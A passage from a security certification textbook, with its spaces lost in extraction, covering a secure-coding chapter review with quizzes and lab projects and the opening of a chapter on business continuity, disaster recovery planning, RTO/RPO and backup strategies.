securitychecks.Thereasonsforthisaretwofold.First,theclientcanchangeanythingafterthecheck.Andsecond,thedatacanbealteredwhileintransitoratanintermediaryproxy.Forallchecksthatareessential,eitherforbusinessreasonsorsecurity,theverificationstepsshouldbeperformedontheserverside,wherethedataisfreefromunauthorizedalterations.Inputvalidationcheckscanbesafelyperformedonlyontheserverside.
ExamTip:Allinputvalidationshouldbeperformedontheserversideoftheclient–serverrelationship,whereitisfreefromoutsideinfluenceandchange.
Chapter18Review
ForMoreInformationSAFECodewww.safecode.orgDHSBuildSecurityInhttps://buildsecurityin.us-cert.govMicrosoftSDLwww.microsoft.com/sdlCVEhttp://cve.mitre.orgCWEhttp://cwe.mitre.orgCWE/SANSTop25http://cwe.mitre.org/top25/index.html
ChapterSummary
Afterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingaboutsecurityissuesrelatedtosoftwaredevelopment.
Describehowsecurecodingcanbeincorporatedintothesoftwaredevelopmentprocess
Therequirementsphaseisthemostimportantpartofthesoftwareengineeringprocesssinceitoutlinestheproject’sfuturerequirements,thusdefiningitsscopeandlimitations.
Theuseofanenhancedlifecycledevelopmentprocesstoincludesecurityelementswillbuildsecurityintotheproduct.
Listthemajortypesofcodingerrorsandtheirrootcauses
Thecommonestcodingerrorisabuffer-overflowcondition.
Codeinjectionerrorscanresultinundesiredcodeexecutionasdefinedbytheenduser.
Inputvalidationisthebestmethodofinsuringagainstbufferoverflowsandcodeinjectionerrors.
Describegoodsoftwaredevelopmentpracticesandexplainhowtheyimpactapplicationsecurity
Earlytestinghelpsresolveerrorsatanearlierstageandresultsincleanercode.
Security-relatedusecasescanbeusedtotestforspecificsecurityrequirements.
Fuzztestingcanfindawiderangeoferrors.
Describehowusingasoftwaredevelopmentprocessenforcessecurityinclusioninaproject
Securityisbuiltintothesoftwarebyincludingsecurityconcernsand
reviewsthroughoutthesoftwaredevelopmentprocess.
Regardlessofthespecificsoftwareengineeringprocessmodelused,securitycanbeincludedinthenormalprocessbybeinginputasrequirements.
Learnaboutapplicationhardeningtechniques
Thefirststepinapplicationhardeningisdeterminingtheapplicationconfigurationbaseline.
ApplicationsrequirepatchingaswellastheOS,andproperenterpriseapplicationpatchmanagementisimportant.
Allvalidationsofclient-to-serverdataneedtobedoneontheserverside,forthisisthesecuritycontrollablesideofthecommunication.
KeyTermsagilemodel(559)black-boxtesting(567)bufferoverflow(575)canonicalizationerror(569)codeinjection(573)CommonVulnerabilitiesandExposures(CVE)(563)CommonWeaknessEnumeration(CWE)(563)cryptographicallyrandom(566)CWE/SANSTop25MostDangerousSoftwareErrors(563)deprecatedfunction(566)evolutionarymodel(559)fuzzing(567)grey-boxtesting(567)leastprivilege(563)requirementsphase(561)
securedevelopmentlifecycle(SDL)model(559)spiralmodel(559)SQLinjection(573)testingphase(567)Top25list(563)usecase(567)waterfallmodel(559)white-boxtesting(567)zero-day(577)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1.The_______________isalinearsoftwareengineeringmodelwithnorepeatingsteps.
2.A(n)_______________causesanapplicationtomalfunctionduetoamisrepresentednameforaresource.
3.CWE-20:ImproperInputValidationreferstoa(n)_______________.
4.Usingaseriesofmalformedinputtotestforconditionssuchasbufferoverflowsiscalled_______________.
5.ModifyingaSQLstatementthroughfalseinputtoafunctionisanexampleof_______________.
6.Usinganadministrator-levelaccountforallfunctionsisaviolationoftheprincipleof_______________.
7.The_______________isthefirstopportunitytoaddresssecurityfunctionalityduringaproject.
8.Thebanningof_______________helpsimprovecodequalityby
usingsaferlibrarycalls.
9.A(n)_______________isavulnerabilitythathasbeendiscoveredbyhackers,butnotbythedevelopersofthesoftware.
10.Anumberthatissuitableforanencryptionfunctioniscalled_______________.
Multiple-ChoiceQuiz1.Whichofthefollowingisnotrelatedtoabufferoverflow?
A.Staticbufferoverflow
B.Indexerror
C.Canonicalizationerror
D.Heapoverflow
2.Whichofthefollowingisnotinvolvedwithacodeinjectionerror?A.SQLstatementbuilding
B.Inputvalidation
C.JavaScript
D.ApointerintheClanguage
3.Inputvalidationisimportanttopreventwhat?A.Bufferoverflow
B.Indexsequenceerror
C.Operatoroverloaderror
D.Unhandledexception
4.It’smostimportanttodefinesecurityrequirementsduring:
A.Testing
B.Usecasedevelopment
C.Codewalkthroughs
D.Therequirementsphaseoftheproject
5.Thelargestclassoferrorsinsoftwareengineeringcanbeattributedto:
A.Poortesting
B.Privilegeviolations
C.Improperinputvalidation
D.Canonicalizationerrors
6.Leastprivilegeappliesto:A.Onlytheapplicationcode
B.Onlytocallstooperatingsystemobjects
C.Allresourcerequestsfromapplicationstootherentities
D.Applicationsundernameduseraccounts
7.Commoncryptographicfailuresincludewhichofthefollowing?A.Useofcryptographicallyrandomnumbers
B.Cryptographicsequencefailures
C.Poorencryptionprotocols
D.Canonicalizationerrors
8.Whenistestingbestaccomplished?A.Afterallcodeisfinished
B.Asearlyaspossibleintheprocess
C.Usingcryptographicallyrandomelements
D.Usingthird-partytestingsoftware
9.Codereviewbyasecondpartyishelpfultodowhat?A.Increasecreativityofthejuniorprogrammer
B.Reducecost—makingforabetter,cheapermethodoftesting
C.Catcherrorsearlyintheprogrammingprocess
D.Ensureallmodulesworktogether
10.Oneofthemostfundamentalrulestogoodcodingpracticeis:A.Codeonce,testtwice.
B.Validateallinputs.
C.Don’tusepointers.
D.Useobscurecodingpracticessovirusescannotliveinthecode.
EssayQuiz1.Describetherelationshipoftherequirementsphase,testingphase,
andusecaseswithrespecttosoftwareengineeringdevelopmentandsecurecode.
2.Developalistoffivesecurity-relatedissuestobeputintoarequirementsdocumentaspartofasecurecodinginitiative.
3.Choosetworequirementsfromthepreviousquestionanddescribeusecasesthatwouldvalidatetheminthetestingphase.
4.Youhavebeenaskedbyyourmanagertodevelopaworksheetforcodewalkthroughs,anothernameforstructuredcodereviews.Thisworksheetshouldincludealistofcommonerrorstolookforduringtheexamination,actingasamemoryaid.Youwanttoleavea
lastingimpressionontheteamasanewcollegegrad.Outlinewhatyouwouldincludeontheworksheetrelatedtosecurity.
LabProjects
•LabProject18.1Learnthespecificsoftwareengineeringprocessmodelusedatalocalfirm(oryoumaybeabletoresearchacompanyonlineorfindoneinasoftwareengineeringtextbookatalibrary).Examinewheresecurityisbuilt,orcouldbebuilt,intothemodel.Provideanoverviewofthestrengthsandopportunitiesofthemodelwithrespecttodesigningsecurecode.
•LabProject18.2DevelopanexampleofaSQLinjectionstatementforawebpageinquiry.Listthewebpageinputs,whattheprojectedback-endSQLis,andhowitcanbechanged.
chapter19 BusinessContinuityandDisasterRecovery,
andOrganizationalPolicies
Thesuperiorman,whenrestinginsafety,doesnotforgetthatdangermaycome.Wheninastateofsecurityhedoesnotforgetthepossibilityofruin.Whenallisorderly,hedoesnotforget
M
disordermaycome.ThushispersonisnotendangeredandhisStatesandalltheirclansarepreserved.
—CONFUCIUS
Inthischapter,youwilllearnhowto
Describethevariouscomponentsofabusinesscontinuityplan
Describetheelementsofdisasterrecoveryplans
Describethevariouswaysbackupsareconductedandstored
Explaindifferentstrategiesforalternativesiteprocessing
uchofthisbookfocusesonavoidingthelossofconfidentialityorintegrityduetoasecuritybreach.Theissueofavailabilityisalsodiscussedintermsofspecificevents,suchasdenial-of-serviceand
distributedDoSattacks.Inreality,however,therearemanythingsthatcandisrupttheoperationsofyourorganization.Fromthestandpointofyourclientsandemployees,whetheryourorganization’swebsiteisunavailablebecauseofastormorbecauseofanintrudermakeslittledifference—thesiteisstillunavailable.Inthischapter,we’lldiscusswhatdotowhenasituationarisesthatresultsinthedisruptionofservices.Thisdiscussionincludesbothdisasterrecoveryandbusinesscontinuity.
BusinessContinuityKeepinganorganizationrunningwhenaneventoccursthatdisruptsoperationsisnotaccomplishedspontaneouslybutrequiresadvanceplanningandperiodicallyexercisingthoseplanstoensuretheywillwork.Atermthatisoftenusedwhendiscussingtheissueofcontinuedorganizationaloperationsisbusinesscontinuity(BC).
ExamTip:ThetermsDRandBCareoftenusedsynonymouslyandsometimestogetherasinBC/DR,buttherearesubtledifferencesbetweenthem.Studythissectioncarefullytoensurethatyoucandiscriminatebetweenthetwoterms.
Therearemanyriskmanagementbestpracticesassociatedwithbusinesscontinuity.Thetopicsofplanning,businessimpactanalysis,identificationofcriticalsystemsandcomponents,singlepointsoffailure,andmorearedetailedinthefollowingsections.
BusinessContinuityPlansAsinmostoperationalissues,planningisafoundationalelementtosuccess.Thisistrueinbusinesscontinuity,andthebusinesscontinuityplan(BCP)representstheplanningandadvancepolicydecisionstoensurethebusinesscontinuityobjectivesareachievedduringatimeofobviousturmoil.Youmightwonderwhatthedifferenceisbetweenadisasterrecoveryplanandabusinesscontinuityplan—afterall,isn’tthepurposeofdisasterrecoverythecontinuedoperationoftheorganizationorbusinessduringaperiodofdisruption?Manytimes,thesetwotermsaresometimesusedsynonymously,andformanyorganizationstheremaybenomajordifferenceinthetwo.Thereare,however,realdifferencesbetweenaBCPandaDRP,oneofwhichisthefocus.ThefocusofaBCPisthecontinuedoperationoftheessentialelements
businessororganization.Businesscontinuityisnotaboutoperationsasnormal,butratherabouttrimmed-down,essentialoperationsonly.Likelife-support,goodforaperiodtobuytimetorecover,butnotaleanerwayofrunningtheoperation.ThefocusofaDRPisontherecoveryandrebuildingoftheorganizationafteradisasterhasoccurred.Andthisrecoveryisallthewaybacktoacompleteoperationofallelementsofthebusiness.TheDRPispartofthelargerpicture,whiletheBCPisatacticalnecessityuntiloperationscanberestored.AmajorfocusoftheDRPistheprotectionofhumanlife.Evacuationplansandsystemshutdownproceduresshouldbeaddressed.ThesafetyofemployeesshouldbeathemethroughoutaDRP.InaBCP,youwillseeamoresignificant
emphasisplacedonthelimitednumberofcriticalsystemstheorganizationneedstooperate.TheBCPwilldescribethefunctionsthataremostcritical,basedonapreviouslyconductedbusinessimpactanalysis,andwilldescribetheorderinwhichfunctionsshouldbereturnedtooperation.TheBCPdescribeswhatisneededinorderforthebusinesstocontinuetooperateintheshortterm,evenifallrequirementsarenotmetandriskprofilesarechanged.
BusinessImpactAnalysisBusinessimpactanalysis(BIA)isthetermusedtodescribethedocumentthatdetailsthespecificimpactofelementsonabusinessoperation(thismayalsobereferredtoasabusinessimpactassessment).ABIAoutlineswhatthelossofanyofyourcriticalfunctionswillmeantotheorganization.TheBIAisafoundationaldocumentusedtoestablishawiderangeofpriorities,includingsystembackupsandrestoration,whichareneededinmaintainingcontinuityofoperation,andmore.Whileeachpersonmayconsidertheirindividualtaskstobeimportant,theBIAisabusiness-levelanalysisofthecriticalityofallelementswithrespecttothebusinessasawhole.TheBIAwilltakeintoaccounttheincreasedriskfromminimaloperations,andisdesignedtodetermineandjustifywhatisessentiallycriticalforabusinesstosurviveversuswhatsomeonemaystateorwish.
ConductingaBIAisacriticalpartofdevelopingyourDRP.Thisassessmentwillallowyoutofocusonthemostcriticalelementsofyourorganization.Thesecriticalelementsaretheonesthatyouwanttoensurearerecoveredfirst,andthispriorityshouldbereflectedinyourDRP.
IdentificationofCriticalSystemsandComponents
Afoundationalelementofasecurityplanisanunderstandingofthecriticalityofsystems,thedata,andthecomponents.Identifyingthecriticalsystemsandcomponentsisoneofthefirststepsanorganizationneedstoundertakeindesigningthesetofsecuritycontrols.Asthesystemsevolveandchange,thecontinuedidentificationofthecriticalsystemsneedstooccur,keepingtheinformationup-to-dateandcurrent.
RemovingSinglePointsofFailureAkeysecuritymethodologyistoattempttoavoidasinglepointoffailureincriticalfunctionswithinanorganization.WhendevelopingyourBCP,youshouldbeonthelookoutforareasinwhichacriticalfunctionreliesonasingleitem(suchasswitches,routers,firewalls,powersupplies,software,ordata)thatiflostwouldstopthiscriticalfunction.Whenthesepointsareidentified,thinkabouthoweachofthesepossiblesinglepointsoffailurecanbeeliminated(ormitigated).Inadditiontotheinternalresourcesyouneedtoconsiderwhen
evaluatingyourbusinessfunctions,therearemanyresourcesexternaltoyourorganizationthatcanimpacttheoperationofyourbusiness.Youmustlookbeyondhardware,software,anddatatoconsiderhowthelossofvariouscriticalinfrastructurescanalsoimpactbusinessoperations.
RiskAssessmentTheprinciplesofriskassessmentcanbeappliedtobusinesscontinuityplanning.Determiningthesourcesandmagnitudesofrisksisnecessaryinallbusinessoperations,includingbusinesscontinuityplanning.
SuccessionPlanningBusinesscontinuityplanningismorethanjustensuringthathardwareisavailableandoperational.Thepeoplewhooperateandmaintainthesystemarealsoimportant,andintheeventofadisruptiveevent,the
availabilityofkeypersonnelisasimportantashardwareforsuccessfulbusinesscontinuityoperations.ThedevelopmentofasuccessionplanthatidentifieskeypersonnelanddevelopsqualifiedpersonnelforkeyfunctionsisacriticalpartofasuccessfulBCP.
ExamTip:Businesscontinuityisnotonlyabouthardware;plansneedtoincludepeopleaswell.Successionplanningisaproactiveplanforpersonnelsubstitutionsintheeventthattheprimarypersonisnotavailabletofulfilltheirassignedduties.
ContinuityofOperationsThecontinuityofoperationsisimperative,asithasbeenshownthatbusinessesthatcannotquicklyrecoverfromadisruptionhavearealchanceofneverrecovering,andtheymaygooutofbusiness.Theoverallgoalofbusinesscontinuityplanningistodeterminewhichsubsetofnormaloperationsneedstobecontinuedduringperiodsofdisruption.
DisasterRecoveryManytypesofdisasters,whethernaturalorcausedbypeople,candisruptyourorganization’soperationsforsomelengthoftime.Suchdisastersareunlikethreatsthatintentionallytargetyourcomputersystemsandnetworks,suchasindustrialespionage,hacking,attacksfromdisgruntledemployees,andinsiderthreats,becausetheeventsthatcausethedisruptionarenotspecificallyaimedatyourorganization.Althoughbothdisastersandintentionalthreatsmustbeconsideredimportantinplanningfordisasterrecovery,thepurposeofthissectionistofocusonrecoveringfromdisasters.Howlongyourorganization’soperationsaredisrupteddependsinpart
onhowprepareditisforadisasterandwhatplansareinplacetomitigatetheeffectsofadisaster.Anyofthefollowingeventscouldcausea
disruptioninoperations:
Fortunately,thesetypesofeventsdonothappenfrequentlyinanyonelocation.Itismorelikelythatbusinessoperationswillbeinterruptedduetoemployeeerror(suchasaccidentalcorruptionofadatabaseorunpluggingasystemtopluginavacuumcleaner—aneventthathasoccurredatmorethanoneorganization).Agooddisasterrecoveryplanwillprepareyourorganizationforanytypeoforganizationaldisruption.
Disasterscanbecausedbynature(suchasfires,earthquakes,andfloods)orcanbetheresultofsomemanmadeevent(suchaswaroraterroristattack).Theplansanorganizationdevelopstoaddressadisasterneedtorecognizebothofthesepossibilities.Whilemanyoftheelementsinadisasterrecoveryplanwillbesimilarforbothnaturalandmanmadeevents,somedifferencesmightexist.Forexample,recoveringdatafrombackuptapesafteranaturaldisastercanusethemostrecentbackupavailable.If,ontheotherhand,theeventwasalossofalldataasaresultofacomputervirusthatwipedyoursystem,restoringfromthemostrecentbackuptapesmightresultinthereinfectionofyoursystemifthevirushadbeendormantforaplannedperiodoftime.Inthiscaserecoverymightentailrestoringsomefilesfromearlierbackups.
DisasterRecoveryPlans/ProcessNomatterwhateventyouareworriedabout—whethernaturalornot,targetedatyourorganizationornot—youcanmakepreparationstolessentheimpactonyourorganizationandthelengthoftimethatyourorganizationwillbeoutofoperation.Adisasterrecoveryplan(DRP)is
criticalforeffectivedisasterrecoveryefforts.ADRPdefinesthedataandresourcesnecessaryandthestepsrequiredtorestorecriticalorganizationalprocesses.Considerwhatyourorganizationneedstoperformitsmission.This
informationprovidesthebeginningofaDRP,sinceittellsyouwhatneedstobequicklyrestored.Whenconsideringresources,don’tforgettoincludeboththephysicalresources(suchascomputerhardwareandsoftware)andthepersonnel(thepeoplewhoknowhowtorunthesystemsthatprocessyourcriticaldata).TobegincreatingyourDRP,firstidentifyallcriticalfunctionsforyour
organization,andthenanswerthefollowingquestionsforeachofthesecriticalfunctions:
Whoisresponsiblefortheoperationofthisfunction?
Whatdotheseindividualsneedtoperformthefunction?
Whenshouldthisfunctionbeaccomplishedrelativetootherfunctions?
Wherewillthisfunctionbeperformed?
Howisthisfunctionperformed(whatistheprocess)?
Whyisthisfunctionsoimportantorcriticaltotheorganization?
Byansweringthesequestions,youcancreateaninitialdraftofyourorganization’sDRP.Thenameoftenusedtodescribethedocumentcreatedbyaddressingthesequestionsisabusinessimpactassessment(BIA).BoththeDRPandtheBCP,ofcourse,willneedtobeapprovedbymanagement,anditisessentialthattheybuyintotheplan—otherwiseyoureffortswillmorethanlikelyfail.Theoldadage“Thosewhofailtoplan,plantofail”certainlyappliesinthissituation.AgoodDRPmustincludetheprocessesandproceduresneededto
restoreyourorganizationtoproperfunctioningandtoensurecontinuedoperation.Whatspecificstepswillberequiredtorestoreoperations?Theseprocessesshouldbedocumentedand,wherepossibleandfeasible,
reviewedandexercisedonaperiodicbasis.Havingaplanwithstep-by-stepproceduresthatnobodyknowshowtofollowdoesnothingtoensurethecontinuedoperationoftheorganization.ExercisingyourDRPandprocessesbeforeadisasteroccursprovidesyouwiththeopportunitytodiscoverflawsorweaknessesintheplanwhenthereisstilltimetomodifyandcorrectthem.Italsoprovidesanopportunityforkeyfiguresintheplantopracticewhattheywillbeexpectedtoaccomplish.
Itisoftenveryinformativetodeterminewhatcategoryyourvariousbusinessfunctionsfallinto.Youmayfindthatcertainfunctionscurrentlybeingconductedarenotessentialtoyouroperationsandcouldbeeliminated.Inthisway,preparingforasecurityeventmayactuallyhelpyoustreamlineyouroperationalprocesses.
CategoriesofBusinessFunctionsIndevelopingyourBIAandDRP,youmayfinditusefultocategorizethevariousfunctionsyourorganizationperforms,suchasshowninTable19.1.Thiscategorizationisbasedonhowcriticalorimportantthefunctionistoyourbusinessoperationandhowlongyourorganizationcanlastwithoutthefunction.Thosefunctionsthatarethemostcriticalwillberestoredfirst,andyourDRPshouldreflectthis.Ifthefunctiondoesn’tfallintoanyofthefirstfourcategories,thenitisnotreallyneededandtheorganizationshouldseriouslyconsiderwhetheritcanbeeliminatedaltogether.
Table19.1 DRPConsiderations
ThedifferencebetweenaDRPandBCPisthattheBCPwillbeusedtoensurethatyouroperationscontinueinthefaceofwhatevereventhasoccurredthathascausedadisruptioninoperations.Ifadisasterhasoccurredandhasdestroyedallorpartofyourfacility,theDRPportionoftheBCPwilladdressthebuildingoracquisitionofanewfacility.TheDRPcanalsoincludedetailsrelatedtothelong-termrecoveryoftheorganization.Howeveryouviewthesetwoplans,anorganizationthatisnotableto
quicklyrestorebusinessfunctionsafteranoperationalinterruptionisan
organizationthatwillmostlikelysufferanunrecoverablelossandmayceasetoexist.
TechTip
DRPvs.BCPAlthoughthetermsDRPandBCPmaybeusedsynonymouslyinsmallfirms,inlargefirms,thereisadifferenceinfocusbetweenthetwoplans.ThefocusoftheBCPisoncontinuedoperationofabusiness,albeitatareducedlevelorthroughdifferentmeansduringsomeperiodoftime.TheDRPisfocusedspecificallyonrecoveringfromadisaster.Inmanycases,bothofthesefunctionshappenatthesametime,andhencetheyarefrequentlycombinedinsmallfirmsandinmanydiscussions.Inlarge,complexentities,theyareseparateplansusedtoprovidemanagementoptionsforarangeofsituations.
ITContingencyPlanningImportantpartsofanyorganizationtodayaretheinformationtechnology(IT)processesandassets.Withoutcomputersandnetworks,mostorganizationscouldnotoperate.Asaresult,itisimperativethataBCPincludesITcontingencyplanning.DuetothenatureoftheInternetandthethreatsthatcomefromit,anorganization’sITassetswilllikelyfacesomelevelofdisruptionbeforetheorganizationsuffersfromadisruptionduetoanaturaldisaster.Eventssuchasviruses,worms,computerintruders,anddenial-of-serviceattackscouldresultinanorganizationlosingpartorallofitscomputingresourceswithoutwarning.Consequently,theITcontingencyplansaremorelikelytobeneededthantheotheraspectsofaBCP.Theseplansshouldaccountfordisruptionscausedbyanyofthesecuritythreatsdiscussedthroughoutthisbookaswellasdisastersorsimplesystemfailures.
Test,Exercise,andRehearseAnorganizationshouldpracticeitsDRPperiodically.Thetimetofindout
whetherithasflawsisnotwhenanactualeventoccursandtherecoveryofdataandinformationmeansthecontinuedexistenceoftheorganization.TheDRPshouldbetestedtoensurethatitissufficientandthatallkeyindividualsknowtheirroleinthespecificplan.Thesecurityplandeterminesiftheorganization’splanandtheindividualsinvolvedperformastheyshouldduringasimulatedsecurityincident.Atestimpliesa“grade”willbeappliedtotheoutcome.Didthe
organization’splanandtheindividualsinvolvedperformastheyshould?Wastheorganizationabletorecoverandcontinuetooperatewithinthepredefinedtolerancessetbymanagement?Iftheanswerisno,thenduringthefollow-upevaluationoftheexercise,thefailuresshouldbeidentifiedandaddressed.Wasitsimplyamatterofuntrainedoruninformedindividuals,orwasthereatechnologicalfailurethatnecessitatesachangeinhardware,software,andprocedures?Whereasatestimpliesa“grade,”anexercisecanbeconductedwithout
thestigmaofapass/failgradebeingattached.Securityexercisesareconductedtoprovidetheopportunityforallpartiestopracticetheproceduresthathavebeenestablishedtorespondtoasecurityincident.Itisimportanttoperformasmanyoftherecoveryfunctionsaspossible,withoutimpactingongoingoperations,toensurethattheproceduresandtechnologywillworkinarealincident.Youmaywanttoperiodicallyrehearseportionsoftherecoveryplan,particularlythoseaspectsthateitherarepotentiallymoredisruptivetoactualoperationsorrequiremorefrequentpracticebecauseoftheirimportanceordegreeofdifficulty.Additionally,therearedifferentformatsforexerciseswithvarying
degreesofimpactontheorganization.Themostbasicisachecklistwalkthroughinwhichindividualsgothrougharecoverychecklisttoensurethattheyunderstandwhattodoshouldtheplanbeinvokedandconfirmthatallnecessaryequipment(hardwareandsoftware)isavailable.Thistypeofexercisenormallydoesnotreveal“holes”inaplanbutwillshowwherediscrepanciesexistinthepreparationfortheplan.Toexaminethecompletenessofaplan,adifferenttypeofexerciseneedstobeconducted.Thesimplestisatabletopexerciseinwhichparticipantssit
aroundatablewithafacilitatorwhosuppliesinformationrelatedtothe“incident”andtheprocessesthatarebeingexamined.Anothertypeofexerciseisafunctionaltestinwhichcertainaspectsofaplanaretestedtoseehowwelltheywork(andhowwellpreparedpersonnelare).Atthemostextremearefulloperationalexercisesdesignedtoactuallyinterruptservicesinordertoverifythatallaspectsofaplanareinplaceandsufficienttorespondtothetypeofincidentthatisbeingsimulated.
Exercisesareanoftenoverlookedaspectofsecurity.Manyorganizationsdonotbelievethattheyhavethetimetospendonsuchevents,butthequestiontoaskiswhethertheycanaffordtonotconducttheseexercises,astheyensuretheorganizationhasaviableplantorecoverfromdisastersandthatoperationscancontinue.Makesureyouunderstandwhatisinvolvedinthesecriticaltestsofyourorganization’splans.
TabletopExercisesExercisingoperationalplansisaneffortthatcantakeonmanydifferentforms.Forseniordecisionmakers,thepointofactionismoretypicallyadeskoraconferenceroom,withtheirmethodbeingmeetingsanddecisions.Acommonformofexercisingoperationalplansforseniormanagementisthetabletopexercise.Theseniormanagementteam,orelementsofit,aregatheredtogetherandpresentedascenario.Theycanwalkthroughtheirdecision-makingsteps,communicatewithothers,andgothroughthemotionsoftheexerciseinthepatterninwhichtheywouldlikelybeinvolved.Thescenarioispresentedataleveltotesttheresponsivenessoftheirdecisionsanddecision-makingprocess.Becausetheeventisfrequentlyruninaconferenceroom,aroundatable,thenametabletopexercisehascometodefinethisformofexercise.
RecoveryTimeObjectiveandRecoveryPointObjective
Thetermrecoverytimeobjective(RTO)isusedtodescribethetargettimethatissetforaresumptionofoperationsafteranincident.Thisisaperiodoftimethatisdefinedbythebusiness,basedontheneedsoftheenterprise.AshorterRTOresultsinhighercostsbecauseitrequiresgreatercoordinationandresources.Thistermiscommonlyusedinbusinesscontinuityanddisasterrecoveryoperations.Recoverypointobjective(RPO),atotallydifferentconceptfromRTO,
isthetimeperiodrepresentingthemaximumperiodofacceptabledataloss.TheRPOdeterminesthefrequencyofbackupoperationsnecessarytopreventunacceptablelevelsofdataloss.AsimpleexampleofestablishingRPOistoanswerthefollowingquestions:Howmuchdatacanyouaffordtolose?Howmuchreworkistolerable?RTPandRPOareseeminglyrelatedbutinactualitymeasuredifferent
thingsentirely.TheRTOservesthepurposeofdefiningtherequirementsforbusinesscontinuity,whiletheRPOdealswithbackupfrequency.ItispossibletohaveanRTOof1dayandanRPOof1hour,oranRTOof1hourandanRPOof1day.Thedeterminingfactorsaretheneedsofthebusiness.
Althoughrecoverytimeobjectiveandrecoverypointobjectiveseemtobethesameorsimilar,theyareverydifferent.TheRTOservesthepurposeofdefiningtherequirementsforbusinesscontinuity,whiletheRPOdealswithbackupfrequency.
BackupsAkeyelementinanyBC/DRplanistheavailabilityofbackups.Thisistruenotonlybecauseofthepossibilityofadisaster,butalsobecausehardwareandstoragemediawillperiodicallyfail,resultinginlossorcorruptionofcriticaldata.Anorganizationmightalsofindbackupscriticalwhensecuritymeasureshavefailedandanindividualhasgainedaccesstoimportantinformationthatmayhavebecomecorruptedorattheveryleastcan’tbetrusted.Databackupisthusacriticalelementintheseplans,as
wellasinnormaloperation.Thereareseveralfactorstoconsiderinanorganization’sdatabackupstrategy:
Howfrequentlyshouldbackupsbeconducted?
Howextensivedothebackupsneedtobe?
Whatistheprocessforconductingbackups?
Whoisresponsibleforensuringbackupsarecreated?
Wherewillthebackupsbestored?
Howlongwillbackupsbekept?
Howmanycopieswillbemaintained?
Keepinmindthatthepurposeofabackupistoprovidevalid,uncorrupteddataintheeventofcorruptionorlossoftheoriginalfileorthemediawherethedatawasstored.Dependingonthetypeoforganization,legalrequirementsformaintainingbackupscanalsoaffecthowitisaccomplished.
TechTip
BackupsAreaKeyResponsibilityforAdministratorsOneofthemostimportanttoolsasecurityadministratorhasisabackup.Whilebackupswillnotpreventasecurityevent(ornaturaldisaster)fromoccurring,theyoftencansaveanorganizationfromacatastrophebyallowingittoquicklyreturntofulloperationafteraneventoccurs.Conductingfrequentbackupsandhavingaviablebackupandrecoveryplanaretwoofthemostimportantresponsibilitiesofasecurityadministrator.
WhatNeedstoBeBackedUpBackupscommonlycomprisethedatathatanorganizationreliesontoconductitsdailyoperations.Whilethisiscertainlyessential,agoodbackupplanwillconsidermorethanjustthedata;itwillincludeany
applicationprogramsneededtoprocessthedataandtheoperatingsystemandutilitiesthatthehardwareplatformrequirestoruntheapplications.Obviously,theapplicationprogramsandoperatingsystemwillchangemuchlessfrequentlythanthedataitself,sothefrequencywithwhichtheseitemsneedtobebackedupisconsiderablydifferent.Thisshouldbereflectedintheorganization’sbackupplanandstrategy.TheBC/DRplanshouldalsoaddressotheritemsrelatedtobackups.
Personnel,equipment,andelectricalpowermustalsobepartoftheplan.Somebodyneedstounderstandtheoperationofthecriticalhardwareandsoftwareusedbytheorganization.Ifthedisasterthatdestroyedtheoriginalcopyofthedataandtheoriginalsystemsalsoresultsinthelossoftheonlypersonnelwhoknowhowtoprocessthedata,havingbackupdatawillnotbeenoughtorestorenormaloperationsfortheorganization.Similarly,ifthedatarequiresspecificsoftwaretoberunonaveryspecifichardwareplatform,thenhavingthedatawithouttheapplicationprogramorrequiredhardwarewillalsonotbesufficient.
TechTip
ImplementingtheRightTypeofBackupsCarefullyconsiderthetypeofbackupthatyouwanttoconduct.Withthesizeoftoday’sPCharddrives,acompletebackupoftheentireharddrivecantakeaconsiderableamountoftime.Implementthetypeofbackupthatyouneedandcheckforsoftwaretoolsthatcanhelpyouinestablishingaviablebackupschedule.
StrategiesforBackupsTheprocessforcreatingabackupcopyofdataandsoftwarerequiresmorethoughtthansimplystating“copyallrequiredfiles.”Thesizeoftheresultingbackupmustbeconsidered,aswellasthetimerequiredtoconductthebackup.Bothofthesewillaffectdetailssuchashowfrequentlythebackupwilloccurandthetypeofstoragemediumthatwillbeusedforthebackup.Otherconsiderationsincludewhowillbe
responsibleforconductingthebackup,wherethebackupswillbestored,andhowlongtheyshouldbemaintained.Short-termstorageforaccidentallydeletedfilesthatusersneedtohaverestoredshouldprobablybecloseathand.Longer-termstorageforbackupsthatmaybeseveralmonthsorevenyearsoldshouldoccurinadifferentfacility.Itshouldbeevidentbynowthatevensomethingthatsoundsassimpleasmaintainingbackupcopiesofessentialdatarequirescarefulconsiderationandplanning.
TypesofBackupsTheamountofdatathatwillbebackedup,andthetimeittakestoaccomplishthis,hasadirectbearingonthetypeofbackupthatshouldbeperformed.Table19.2outlinesthefourbasictypesofbackupsthatcanbeconducted,theamountofspacerequiredforeach,andtheeaseofrestorationusingeachstrategy.
Table19.2 BackupTypesandCharacteristics
ThevaluesforeachofthestrategiesinTable19.2arehighlyvariabledependingonyourspecificenvironment.Themorefrequentlyfilesarechangedbetweenbackups,themorethesestrategieswilllookalike.Whateachstrategyentailsbearsfurtherexplanation.
TechTip
ArchiveBitsThearchivebitisusedtoindicatewhetherafilehas(1)orhasnot(0)changedsincethelastbackup.Thebitisset(changedtoa1)ifthefileismodified,orinsomecases,ifthefileis
copied,thenewcopyofthefilehasitsarchivebitset.Thebitisreset(changedtoa0)whenthefileisbackedup.Thearchivebitcanbeusedtodeterminewhichfilesneedtobebackedupwhenusingmethodssuchasthedifferentialbackupmethod.
Theeasiesttypeofbackuptounderstandisthefullbackup.Inafullbackup,allfilesandsoftwarearecopiedontothestoragemedia.Restorationfromafullbackupissimilarlystraightforward—youmustcopyallthefilesbackontothesystem.Thisprocesscantakeaconsiderableamountoftime.ConsiderthesizeofeventheaveragehomePCtoday,forwhichstorageismeasuredintensandhundredsofgigabytes.Copyingthisamountofdatatakestime.Inafullbackup,thearchivebitiscleared.Inadifferentialbackup,onlythefilesandsoftwarethathavechanged
